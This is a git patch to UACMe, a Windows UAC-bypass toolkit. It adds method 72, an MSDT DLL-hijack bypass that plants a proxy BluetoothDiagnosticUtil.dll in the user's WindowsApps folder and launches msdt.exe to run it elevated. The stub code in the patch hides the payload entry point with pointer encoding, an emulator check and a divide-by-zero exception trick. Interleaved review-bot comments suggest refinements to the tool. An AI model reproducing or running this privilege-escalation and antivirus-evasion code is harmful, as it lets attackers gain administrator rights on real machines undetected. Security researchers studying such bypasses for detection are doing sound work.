From aed877814449c058eefa5c8a292de1bdc6bcb5f2 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Fri, 4 Feb 2022 22:14:05 +0700 Subject: [PATCH] v 3.5.9 Method 72 added Release candidate 1 --- LICENSE.md | 2 +- README.md | 13 ++++- Source/Akagi/bin64res.h | Bin 212 -> 264 bytes Source/Akagi/bin64res.rc | 1 + Source/Akagi/global.h | 16 +++++- Source/Akagi/main.c | 13 ++--- Source/Akagi/methods/hybrids.c | 99 +++++++++++++++++++++++++++++++- Source/Akagi/methods/hybrids.h | 10 +++- Source/Akagi/methods/methods.c | 17 ++++-- Source/Akagi/methods/methods.h | 7 ++- Source/Akagi/stub.c | 91 ++++++++++++++--------------- Source/Akagi/stub.h | 8 +-- Source/Akagi/uacme.vcxproj | 2 +- Source/Akagi/uacme.vcxproj.user | 5 +- Source/Akatsuki/version.rc | Bin 4602 -> 4602 bytes Source/Fubuki/version.rc | Bin 4582 -> 4582 bytes Source/Naka/main.c | 11 +++- Source/Shared/consts.h | 10 ++-- UACME.sha256 | 32 +++++------ 19 files changed, 231 insertions(+), 106 deletions(-) diff --git a/LICENSE.md b/LICENSE.md index 2d5e513a..6fcf3e74 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,4 +1,4 @@ -Copyright (c) 2014 - 2021, UACMe authors +Copyright (c) 2014 - 2022, UACMe authors Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: diff --git a/README.md b/README.md index 946f7220..61850e13 100644 --- a/README.md +++ b/README.md @@ -733,6 +733,16 @@ First parameter is number of method to use, second is optional command (executab * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.5.8 +72. Author: Emeric Nasi + * Type: Dll Hijack + * Method: Dll path search abuse + * Target(s): \syswow64\msdt.exe, \system32\sdiagnhost.exe + * Component(s): BluetoothDiagnosticUtil.dll + * Implementation: ucmMsdtMethod + * Works from: Windows 10 (10240) + * Fixed in: unfixed :see_no_evil: + * How: - + * Code status: added in v3.5.9 
@@ -835,9 +845,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105 * UACMe 3.5, WD and the ways of mitigation, https://swapcontext.blogspot.com/2020/10/uacme-35-wd-and-ways-of-mitigation.html * UAC bypasses from COMAutoApprovalList, https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html * Utilizing Programmatic Identifiers (ProgIDs) for UAC Bypasses, https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses +* MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass # Authors -(c) 2014 - 2021 UACMe Project +(c) 2014 - 2022 UACMe Project [![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com) diff --git a/Source/Akagi/bin64res.h b/Source/Akagi/bin64res.h index 6e7736b29717197fff98129abf68e2a352e02e79..32483e9e99c7f394e00dddb20e619e7dce91603f 100644 GIT binary patch delta 23 fcmcb@*ugYm*F-5Ec4G!31_cJAiMomtcS!*NQR@a{ delta 9 QcmeBRy23bN*Ti>H02CAiLjV8( diff --git a/Source/Akagi/bin64res.rc b/Source/Akagi/bin64res.rc index 0590085b..c2deb14d 100644 --- a/Source/Akagi/bin64res.rc +++ b/Source/Akagi/bin64res.rc @@ -2,6 +2,7 @@ #include "winres.h" LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US IDR_FUBUKI64 RCDATA "bin\\fubuki64.cd" +IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd" IDR_AKATSUKI64 RCDATA "bin\\akatsuki64.cd" IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd" IDR_SECRETS RCDATA "bin\\secrets64.bin" diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h index 2c57dac5..281662fa 100644 --- a/Source/Akagi/global.h +++ b/Source/Akagi/global.h 
@@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2021 +* (C) COPYRIGHT AUTHORS, 2014 - 2022 * * TITLE: GLOBAL.H * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 01 Dec 2021 +* DATE: 04 Feb 2022 * * Common header file for the program support routines. * @@ -45,11 +45,13 @@ #include "bin64res.h" #define FUBUKI_ID IDR_FUBUKI64 #define AKATSUKI_ID IDR_AKATSUKI64 +#define FUBUKI32_ID IDR_FUBUKI32 #define KAMIKAZE_ID IDR_KAMIKAZE #else #include "bin32res.h" #define FUBUKI_ID IDR_FUBUKI32 #define AKATSUKI_ID PAYLOAD_ID_NONE //this module unavailable for 32 bit +#define FUBUKI32_ID IDR_FUBUKI32 #define KAMIKAZE_ID IDR_KAMIKAZE #endif @@ -149,5 +151,13 @@ typedef UINT(WINAPI *pfnEntryPoint)( _In_ BOOL OutputToDebugger ); +typedef struct _UACME_THREAD_CONTEXT { + TEB_ACTIVE_FRAME Frame; + pfnEntryPoint ucmMain; + DWORD ReturnedResult; + ULONG OptionalParameterLength; + LPWSTR OptionalParameter; +} UACME_THREAD_CONTEXT, * PUACME_THREAD_CONTEXT; + extern PUACMECONTEXT g_ctx; extern HINSTANCE g_hInstance; diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c index 417d54a6..0678c199 100644 --- a/Source/Akagi/main.c +++ b/Source/Akagi/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2021 +* (C) COPYRIGHT AUTHORS, 2014 - 2022 * * TITLE: MAIN.C * -* VERSION: 3.57 +* VERSION: 3.59 * -* DATE: 01 Nov 2021 +* DATE: 02 Feb 2022 * * Program entry point. * @@ -217,10 +217,5 @@ NTSTATUS WINAPI ucmMain( #pragma comment(linker, "/ENTRY:main") VOID __cdecl main() { -#ifdef _WIN64 - __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain); -#else - __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), (DWORD_PTR)ucmMain); -#endif - ExitProcess(StubInit()); + ExitProcess(StubInit(ucmMain)); } 
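Review bot: `UACME_THREAD_CONTEXT`, added in the last global.h hunk, has no comment even though its layout is load-bearing. stub.c passes `&uctx` to `RtlPushFrame` as a `PTEB_ACTIVE_FRAME` and casts the result of `RtlGetFrame()` back to the struct, so `Frame` has to remain the first member. I would put a comment above the typedef, for example `// Frame must stay the first member: the struct is pushed and recovered as a TEB_ACTIVE_FRAME (see stub.c).` `OptionalParameterLength` and `OptionalParameter` are not referenced by any hunk in this patch, so either document their intended use or leave them out until they are needed.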
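Review bot: `StubInit(ucmMain)` in the second main.c hunk passes the entry point as `PVOID`, so the compiler no longer checks it against `pfnEntryPoint`. The two already disagree in what is visible here: `ucmMain` is declared `NTSTATUS WINAPI`, while the typedef in global.h returns `UINT`. Declaring the parameter as `_In_ pfnEntryPoint EntryPoint` in stub.h and stub.c (both hunks there use the same `PVOID`) and casting explicitly at this call site would keep that mismatch in one reviewed place. `ucmMain`'s parameter list is outside the hunk, so confirm the full signature against the typedef before changing it.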
diff --git a/Source/Akagi/methods/hybrids.c b/Source/Akagi/methods/hybrids.c index 3908f441..86d924df 100644 --- a/Source/Akagi/methods/hybrids.c +++ b/Source/Akagi/methods/hybrids.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2021 +* (C) COPYRIGHT AUTHORS, 2015 - 2022 * * TITLE: HYBRIDS.C * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 01 Dec 2021 +* DATE: 02 Feb 2022 * * Hybrid UAC bypass methods. * 
@@ -1045,3 +1045,96 @@ NTSTATUS ucmJunctionMethod( return MethodResult; } + +/* +* ucmMsdtMethod +* +* Purpose: +* +* Bypass UAC by dll hijack of sdiagnhost. +* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass +* +*/ +NTSTATUS ucmMsdtMethod( + _In_ PVOID ProxyDll, + _In_ DWORD ProxyDllSize +) +{ + BOOLEAN bCleanupNeeded = FALSE; + UINT i; + NTSTATUS MethodResult = STATUS_ACCESS_DENIED; +#ifndef _WIN64 + NTSTATUS ntStatus = STATUS_ACCESS_DENIED; +#endif + WCHAR szPath[MAX_PATH * 2]; + WCHAR szApp[MAX_PATH + 1]; + WCHAR szParams[MAX_PATH * 2]; + +#ifndef _WIN64 + if (g_ctx->IsWow64) { + ntStatus = supEnableDisableWow64Redirection(TRUE); + if (!NT_SUCCESS(ntStatus)) + return ntStatus; + } +#endif + + do { + + RtlSecureZeroMemory(&szPath, sizeof(szPath)); + if (!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE)) + break; + + supConcatenatePaths(szPath, TEXT("Microsoft\\WindowsApps"), MAX_PATH); + supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH); + + if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize)) + break; + + bCleanupNeeded = TRUE; + + _strcpy(szApp, g_ctx->szSystemRoot); + supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH); + supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH); + + _strcpy(szParams, TEXT("-path ")); + _strcat(szParams, g_ctx->szSystemRoot); + _strcat(szParams, TEXT("diagnostics\\index\\BluetoothDiagnostic.xml -skip yes")); + + if (supRunProcess2(szApp, + szParams, + NULL, + SW_HIDE, + 10000)) + { + MethodResult = STATUS_SUCCESS; + } + + } while (FALSE); + + + if (bCleanupNeeded) { + i = 5; + do { + + if (DeleteFile(szPath)) + break; + + Sleep(1000); + i--; + } while (i); + + } + + +#ifndef _WIN64 + if (g_ctx->IsWow64) { + supEnableDisableWow64Redirection(FALSE); + } +#endif + +#ifdef _DEBUG + supSetGlobalCompletionEvent(); +#endif + + return MethodResult; +} diff --git a/Source/Akagi/methods/hybrids.h b/Source/Akagi/methods/hybrids.h index 98358ba4..a7c3fd37 100644 
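Review bot: The cleanup loop at the end of `ucmMsdtMethod` gives up silently after five failed `DeleteFile` attempts, leaving `BluetoothDiagnosticUtil.dll` in the user-writable `Microsoft\WindowsApps` folder under local app data with nothing reported to whoever ran the test. A file left there stays on a DLL search path the README entry describes as abusable, so the residue is a standing exposure on the test machine rather than a cosmetic leftover. I would report the failure after the loop, for example `if (i == 0) OutputDebugString(TEXT("ucmMsdtMethod: proxy dll was not removed\r\n"));`, and list the written path and the `msdt.exe` command line in the header comment so the artifacts are known for cleanup and detection review. Separately, the `10000` passed to `supRunProcess2` is a bare literal, although consts.h already defines `SUPRUNPROCESS_TIMEOUT_DEFAULT`.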
--- a/Source/Akagi/methods/hybrids.h +++ b/Source/Akagi/methods/hybrids.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2021 +* (C) COPYRIGHT AUTHORS, 2015 - 2022 * * TITLE: HYBRIDS.H * -* VERSION: 3.57 +* VERSION: 3.59 * -* DATE: 01 Nov 2020 +* DATE: 02 Feb 2022 * * Prototypes and definitions for hybrid methods. * @@ -53,6 +53,10 @@ NTSTATUS ucmJunctionMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); +NTSTATUS ucmMsdtMethod( + _In_ PVOID ProxyDll, + _In_ DWORD ProxyDllSize); + // // Post execution cleanup routines. // diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c index 79792689..bd32d50b 100644 --- a/Source/Akagi/methods/methods.c +++ b/Source/Akagi/methods/methods.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2021 +* (C) COPYRIGHT AUTHORS, 2015 - 2022 * * TITLE: METHODS.C * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 01 Dec 2021 +* DATE: 04 Feb 2022 * * UAC bypass dispatch. * @@ -45,6 +45,7 @@ UCM_API(MethodFwCplLua2); UCM_API(MethodProtocolHijack); UCM_API(MethodPca); UCM_API(MethodCurVer); +UCM_API(MethodMsdt); ULONG UCM_WIN32_NOT_IMPLEMENTED[] = { UacMethodWow64Logger, @@ -131,7 +132,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, - { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE } + { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, + { MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE } }; /* 
@@ -746,3 +748,10 @@ UCM_API(MethodCurVer) #endif } + +UCM_API(MethodMsdt) +{ + return ucmMsdtMethod( + Parameter->PayloadCode, + Parameter->PayloadSize); +} diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h index 785d0521..5dd16e57 100644 --- a/Source/Akagi/methods/methods.h +++ b/Source/Akagi/methods/methods.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2014 - 2021 +* (C) COPYRIGHT AUTHORS, 2014 - 2022 * * TITLE: METHODS.H * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 21 Nov 2021 +* DATE: 04 Feb 2022 * * Prototypes and definitions for UAC bypass methods table. * @@ -91,6 +91,7 @@ typedef enum _UCM_METHOD { UacMethodPca, //+ UacMethodCurVer, //+ UacMethodNICPoison2, //+ + UacMethodMsdt, //+ UacMethodMax, UacMethodInvalid = 0xabcdef } UCM_METHOD; diff --git a/Source/Akagi/stub.c b/Source/Akagi/stub.c index 5aa9fcad..3d757a4a 100644 --- a/Source/Akagi/stub.c +++ b/Source/Akagi/stub.c @@ -1,12 +1,12 @@ -/******************************************************************************* +/******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2018 - 2022 * * TITLE: STUB.C * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 28 Jan 2022 +* DATE: 02 Feb 2022 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -16,7 +16,7 @@ *******************************************************************************/ #include "global.h" -UINT ucmExitCode = (UINT)STATUS_ACCESS_DENIED; +TEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, "(^/\\^)" }; /* * ucmSehHandler 
@@ -31,66 +31,59 @@ INT ucmSehHandler( _In_ EXCEPTION_POINTERS* ExceptionInfo ) { - DWORD_PTR entry; - NTSTATUS result = wdIsEmulatorPresent(); + UACME_THREAD_CONTEXT* uctx; UNREFERENCED_PARAMETER(ExceptionInfo); if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) { + uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame(); + while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) { + uctx = (UACME_THREAD_CONTEXT*)uctx->Frame.Previous; + } + if (uctx) { + if (uctx->ucmMain) { + uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain); -#ifdef _WIN64 - entry = (DWORD_PTR)__readgsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer)); - __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), 0); - entry = (RotateRight64( - (ULONG_PTR)(ULONG_PTR)entry, - 0x40 - (result & 0x3f)) ^ result); -#else - entry = (DWORD_PTR)__readfsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer)); - __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), 0); - entry = (RotateRight32( - (ULONG_PTR)entry, - 0x20 - (result & 0x1f)) ^ result); -#endif - - ucmExitCode = ((pfnEntryPoint)(entry))(UacMethodInvalid, - NULL, - 0, - FALSE); - + uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid, + NULL, + 0, + FALSE); + } + } return EXCEPTION_EXECUTE_HANDLER; } return EXCEPTION_CONTINUE_SEARCH; } -DWORD StubInit(VOID) +DWORD StubInit( + _In_ PVOID EntryPoint) { int v = 1, d = 0; - DWORD_PTR entry; - NTSTATUS ntStatus = STATUS_NOT_SUPPORTED; + UACME_THREAD_CONTEXT uctx; - __try { + RtlSecureZeroMemory(&uctx, sizeof(uctx)); -#ifdef _WIN64 - entry = (DWORD_PTR)__readgsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer)); - entry = (RotateRight64( - (ULONG_PTR)entry ^ ntStatus, - ntStatus & 0x3f)); - __writegsqword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), entry); -#else - entry = (DWORD_PTR)__readfsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer)); - entry = (RotateRight32( - (ULONG_PTR)entry ^ ntStatus, - ntStatus & 0x1f)); - __writefsdword(FIELD_OFFSET(NT_TIB, ArbitraryUserPointer), entry); -#endif + if 
(wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) { - v = (int)USER_SHARED_DATA->NtProductType; - d = (int)USER_SHARED_DATA->AlternativeArchitecture; - v = (int)(v / d); - } - __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) { - v = ucmExitCode; + uctx.Frame.Context = &g_fctx; + + uctx.ucmMain = (pfnEntryPoint)supEncodePointer(EntryPoint); + RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx); + + __try { + v = (int)USER_SHARED_DATA->NtProductType; + d = (int)USER_SHARED_DATA->AlternativeArchitecture; + v = (int)(v / d); + } + __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) { + v = 1; + } + + RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx); } - return ucmExitCode; + if (v) + return uctx.ReturnedResult; + else + return (DWORD)STATUS_ACCESS_DENIED; } diff --git a/Source/Akagi/stub.h b/Source/Akagi/stub.h index e0d0b81b..5978aea9 100644 --- a/Source/Akagi/stub.h +++ b/Source/Akagi/stub.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2018 - 2021 +* (C) COPYRIGHT AUTHORS, 2018 - 2022 * * TITLE: STUB.H * -* VERSION: 3.57 +* VERSION: 3.59 * -* DATE: 01 Nov 2021 +* DATE: 02 Feb 2022 * * Kuma stub header file * @@ -18,4 +18,4 @@ *******************************************************************************/ #pragma once -DWORD StubInit(VOID); +DWORD StubInit(_In_ PVOID EntryPoint); diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj index f3ad5b26..70e1217f 100644 --- a/Source/Akagi/uacme.vcxproj +++ b/Source/Akagi/uacme.vcxproj @@ -362,7 +362,6 @@ Windows - false true true @@ -372,6 +371,7 @@ 6.1 + false diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user index 067c18d7..4fdce088 100644 --- a/Source/Akagi/uacme.vcxproj.user +++ b/Source/Akagi/uacme.vcxproj.user @@ -16,7 +16,7 @@ WindowsLocalDebugger - 71 + 72 WindowsLocalDebugger @@ -24,7 +24,8 @@ WindowsLocalDebugger - 32 + + WindowsLocalDebugger \ No newline at end of file 
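Review bot: `StubInit` returns `uctx.ReturnedResult` whenever `v` is non-zero, but that field is written only inside `ucmSehHandler`. On every path where the handler never runs (the `wdIsEmulatorPresent()` result is not `STATUS_NOT_SUPPORTED`, or the division does not fault and gives a non-zero quotient) the function returns the zeroed value, so the process exits with 0 although `ucmMain` was never called. The removed code started from `ucmExitCode = (UINT)STATUS_ACCESS_DENIED`; the same default can be kept with `uctx.ReturnedResult = (DWORD)STATUS_ACCESS_DENIED;` directly after the `RtlSecureZeroMemory` call. There is also no comment saying that the entry point is reached only through the exception filter on a deliberate divide-by-zero, and one sentence above the `__try` would help anyone auditing or analysing the binary.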
diff --git a/Source/Akatsuki/version.rc b/Source/Akatsuki/version.rc index ee02fd460dc04c6f24833eb7953ba82b3cfbd9ef..e47a7a879c94fa49d1dc63c3fb1fd43d5d78afef 100644 GIT binary patch delta 76 zcmeyR{7ZSmBo0nX1|0??AT*dfn?s))&SNl|EYB&q`5ngvCZG~MsFL%%lA9lJKVw7) KZ9dPd%>n?@=n_N# delta 76 zcmeyR{7ZSmBo0ms1|0??215qJ$+J21x#2tpqsj7|lAGUgTwnq!(Ss^E&nvn40rxXT LgwW>myxJ@P(l-)7 diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc index 13e8ef3a693a1774ea9a7a080c9febb3538f2905..16336e8328cef20765c60e45fc2aa5def0661204 100644 GIT binary patch delta 76 zcmaE+{7iYnBo0nX1|0??AT*dfn?s))&SNl|EYB&q`5nh0CZG~MsFK%Q`kP;HpJGG^ KZQjkR%>n?&v=S8n delta 76 zcmaE+{7iYnBo0ms1|0??215qJ$+J21x#2tpqsj7|lAGUg9AW}0(Ss^^&85Hj1@|dN LgwW>QyxJ@P#{&`( diff --git a/Source/Naka/main.c b/Source/Naka/main.c index 8f0105d3..a6bc6bb5 100644 --- a/Source/Naka/main.c +++ b/Source/Naka/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 - 2020 +* (C) COPYRIGHT AUTHORS, 2016 - 2022 * * TITLE: MAIN.C * -* VERSION: 3.50 +* VERSION: 3.59 * -* DATE: 14 Sep 2020 +* DATE: 02 Feb 2022 * * Naka, support payload compressor. * @@ -1121,6 +1121,11 @@ VOID CreateSecretTables(VOID) if (ProcessUnit(szFileName, IDR_FUBUKI64, &S[c])) c++; + szFileName[l] = 0; + _strcat(&szFileName[l], L"Fubuki32.key"); + if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c])) + c++; + szFileName[l] = 0; _strcat(&szFileName[l], L"Kamikaze.key"); if (ProcessUnit(szFileName, IDR_KAMIKAZE64, &S[c])) diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h index d08856d4..ba31eed2 100644 --- a/Source/Shared/consts.h +++ b/Source/Shared/consts.h @@ -4,9 +4,9 @@ * * TITLE: CONSTS.H * -* VERSION: 3.58 +* VERSION: 3.59 * -* DATE: 28 Jan 2022 +* DATE: 04 Feb 2022 * * Global consts definition file. * 
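Review bot: The added `Fubuki32.key` unit in `CreateSecretTables` writes one more element through `&S[c]`, and the declaration of `S` is outside the hunk, so it is not visible whether the array gained a slot. If `S` is a fixed-size array sized for the previous number of units, the last `ProcessUnit` call would write past its end. A guard such as `if (c < RTL_NUMBER_OF(S))` before each call, or sizing `S` from the unit list, would rule that out. The function body starts and ends outside the hunk, so check this against the full file.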
@@ -47,8 +47,8 @@ #define UCM_VERSION_MAJOR 3 #define UCM_VERSION_MINOR 5 -#define UCM_VERSION_REVISION 8 -#define UCM_VERSION_BUILD 2201 +#define UCM_VERSION_REVISION 9 +#define UCM_VERSION_BUILD 2202 #define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000 @@ -147,6 +147,7 @@ // #define APISET_KERNEL32LEGACY L"api-ms-win-core-kernel32-legacy-l1.DLL" +#define BLUETOOTHDIAGNOSTICUTIL_DLL L"BluetoothDiagnosticUtil.dll" #define COMCTL32_DLL L"comctl32.dll" #define DISMCORE_DLL L"dismcore.dll" #define DUSER_DLL L"duser.dll" @@ -180,6 +181,7 @@ #define MMC_EXE L"mmc.exe" #define MSCONFIG_EXE L"msconfig.exe" #define MSCHEDEXE_EXE L"mschedexe.exe" +#define MSDT_EXE L"msdt.exe" #define OSK_EXE L"osk.exe" #define PKGMGR_EXE L"pkgmgr.exe" #define SDCLT_EXE L"sdclt.exe" diff --git a/UACME.sha256 b/UACME.sha256 index afa90541..a83f8945 100644 --- a/UACME.sha256 +++ b/UACME.sha256 
@@ -7,26 +7,26 @@ b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397 *Source\Akagi\a 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest 9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25 *Source\Akagi\bin32res.h 3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c *Source\Akagi\bin32res.rc -8977786129c9d6d526fb2e41fb3a3ab25566ee53b60db658a41f75d6f58f4e90 *Source\Akagi\bin64res.h -f7e3861fc30e750c9a65fc338a9ad72a8d7a31ee949aef37cfe98a15b60a9ba2 *Source\Akagi\bin64res.rc +e732850b9f1b5432e5e75ac1ff4312f65e283ee9833b45b390633ea21a99b94a *Source\Akagi\bin64res.h +5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a *Source\Akagi\bin64res.rc bc0e6067d038a528fdfc90793b199ae73f211da7df33341bfd7bcfce2c163eb7 *Source\Akagi\compress.c 5a46c82638d48aaea2edfed0e8c50981dd606be8e3c171f8608f51bc777305cf *Source\Akagi\compress.h d3b0fdac91acd95076de2a1d037c05692712e92ef8f77fd1f8a1db1579ee2923 *Source\Akagi\encresource.h f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788 *Source\Akagi\fusutil.c eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b *Source\Akagi\fusutil.h -d1acbe26c56a6c0b8db84dad2506dd50e84a8842b4f002b81ff9114d9531e8ba *Source\Akagi\global.h -3a00394eb92d3bcbadad8a6313cd6d3ad5061901e80391450efcfe5e9bf8dc1e *Source\Akagi\main.c +e0e97bec016ef156dad00c4986ed620584663a68823e9e8656239d595b915585 *Source\Akagi\global.h +06c1b9b39448d4fd789856f51742c9346917080ca86a2f9b110c30c22d108c4b *Source\Akagi\main.c 9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58 *Source\Akagi\makecab.c bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h 10a31b41ae931835100b1a7537be6fdaec2a306b71110fa9656f9bf5f4a6a76b *Source\Akagi\Resource.rc -002992a366199b4bb180850bede26fd8602be8b36d37d93da6e3778460345fef *Source\Akagi\stub.c 
-d951a09c7011fa1aa3854ea713836c9cd63aa88ac9f64f013d2f24f9fcaa9b38 *Source\Akagi\stub.h +a808ad08347f68f18ddc75eed8e284e8479da7970af5b17a169fa972b8512d9a *Source\Akagi\stub.c +b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06 *Source\Akagi\stub.h 273c6105759779913664cd813232a69382562ff1818756cc689a45b1fd11a902 *Source\Akagi\sup.c 912447a3eb73b10278c965fd9273b4eb75902c41681e76e9a547b57af1e1617a *Source\Akagi\sup.h -f245bd85599293b3c6bc294a01f160393e28703e98dc772ebd8b13d189897055 *Source\Akagi\uacme.vcxproj +ee447f9ad4b2cccb615f8d530048a349243afdafbe9314637115cdd60b1684bd *Source\Akagi\uacme.vcxproj 15a18a8f06b4ce02de316a0b4a6b7a3cb41d6353711d3e2429164622c47e44ab *Source\Akagi\uacme.vcxproj.filters -3779b8e127c260dd6f7bd4b84665465b3e09af811f8c90d6eef10a07d4395de3 *Source\Akagi\uacme.vcxproj.user +f04df8b72d7d5fe30795e4cac6ec1268d1f955150303e366a91ac8f7ba6135be *Source\Akagi\uacme.vcxproj.user fd2bf3f4369850efc4c408133ddf253ced6f0b400b13997060c50a2f9b6cc9d0 *Source\Akagi\uas.h 750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6 *Source\Akagi\appinfo\appinfo.acf 2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5 *Source\Akagi\appinfo\appinfo.idl 
@@ -51,10 +51,10 @@ e7654ba3099afcc9183d3d092e9cbe19ea06faddbbfb554891eeece174d81b8e *Source\Akagi\m cf5152c786b5e72514038a256e0372c176ac20ca49653bbf80a0862963bf3c20 *Source\Akagi\methods\elvint.h 8453310f284faee89d5b5e575d1521dd6dd7983bc9cd67e204a51676d9511916 *Source\Akagi\methods\hakril.c e72fce9d89c7ac424e90635dc984a943890c8422c2a6869c49c3a29accde6521 *Source\Akagi\methods\hakril.h -49e14cdf2c470d50272980c46f15ef7b3ffad41e78de8d6f9cf9c3ee3db09b47 *Source\Akagi\methods\hybrids.c -90aa9cbbbbe621a7215083fbfcd52bfc64df261a6dc795fb719a21a61db0fc9a *Source\Akagi\methods\hybrids.h -1b793c9da6cf4755070ff6bec59bd1affc5e07d87b968ba211cb14b12916c9c4 *Source\Akagi\methods\methods.c -ad157a213ace932adaf09559f91c600588c25a86801d7f1dda04f5973ed6b45d *Source\Akagi\methods\methods.h +1edcbc82ed2f214b03f22305736179b6777a9bab755138b52ab5ae6e9dbf7b0a *Source\Akagi\methods\hybrids.c +112da2d5701041e58b1b01a8d5a42854200b171ec8c8b4712f957f63877e16b6 *Source\Akagi\methods\hybrids.h +a3d618693fc6780e5c1e8d04f3f8e8edb7d64ea77f635e20dbaff64118859585 *Source\Akagi\methods\methods.c 